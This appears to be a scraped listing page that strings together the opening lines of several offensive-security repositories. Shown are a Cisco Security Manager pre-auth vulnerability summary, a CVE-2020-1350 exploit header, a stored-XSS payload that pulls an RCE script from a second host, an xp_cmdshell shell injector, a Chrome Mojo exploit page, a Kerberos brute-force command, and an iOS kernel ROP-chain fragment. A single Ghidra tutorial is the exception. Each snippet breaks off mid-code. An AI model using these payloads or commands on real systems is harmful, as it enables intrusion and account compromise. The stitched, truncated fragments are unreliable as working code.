Frycos

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

joaovarelas

#!/usr/bin/env python3

"""cve-2020-1350.py: Windows DNS Server Vulnerability"""

__author__  = "@joaovarelas"
__date__    = "July, 2020"

import binascii,socket,struct

from dnslib import *

stypr

<!--
	Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin

hfiref0x

typedef interface IEditionUpgradeManager IEditionUpgradeManager;

typedef struct IEditionUpgradeManagerVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in IEditionUpgradeManager * This,
        __RPC__in REFIID riid,

notdodo

#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib

nstarke

Reversing Raw Binary Firmware Files in Ghidra

This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.

Prep work in Binwalk

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

ujin5

<html>
    <pre id='log'></pre>
    <script src="mojo_bindings.js"></script>
    <script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
    <script src="being_creator_interface.mojom.js"></script>
    <script src="food_interface.mojom.js"></script>
    <script src="dog_interface.mojom.js"></script>
    <script src="person_interface.mojom.js"></script>
    <script src="cat_interface.mojom.js"></script>
    <script>

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

ox1111

//#define LOCAL_EXP
#ifdef LOCAL_EXP
    printf("Testing ROP chain \n");
    vm_address_t payload =0x118800000;
    kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
    CHECK_MACH_ERR(kr,"vm_allocate()");
    memcpy((void*)payload, main_payload,payload_size);
 
    char *buf = malloc(1000);
    memset(buf,0xcc,1000);

Jinmo

#!/bin/bash

# ./remote server port 'menu string'

touch "$1" || (echo "Cannot create file named $1" && exit 1)
exec > "$1"
echo 'from pwn import *'
echo ''
echo -e "HOST, PORT = \"$2\", \"$3\""
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi